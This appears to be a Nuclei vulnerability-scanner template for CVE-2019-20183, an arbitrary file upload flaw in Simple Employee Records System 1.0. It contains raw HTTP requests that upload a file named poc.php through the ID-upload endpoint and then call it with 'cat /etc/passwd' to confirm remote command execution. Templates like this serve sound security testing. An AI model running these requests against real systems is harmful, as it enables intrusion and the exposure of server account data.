id: CVE-2019-20183 info: name: Simple Employee Records System 1.0 arbitrary file upload description: Simple Employee Records System 1.0 contains an arbitrary file upload due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or RCE. author: pikpikcu severity: high reference: https://www.exploit-db.com/exploits/49596 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cwe-id: CWE-434 cve-id: CVE-2019-20183 tags: rce,intrusive,cve,upload,cve2019 requests: - raw: - | POST /dashboard/uploadID.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 -----------------------------5825462663702204104870787337 Content-Disposition: form-data; name="employee_ID"; filename="poc.php" Content-Type: image/png -----------------------------5825462663702204104870787337-- - | GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: endpoint part: body internal: true regex: - '(?:[a-zA-Z0-9+\/])*_poc.php' matchers: - type: regex regex: - "root:.*:0:0" condition: and part: body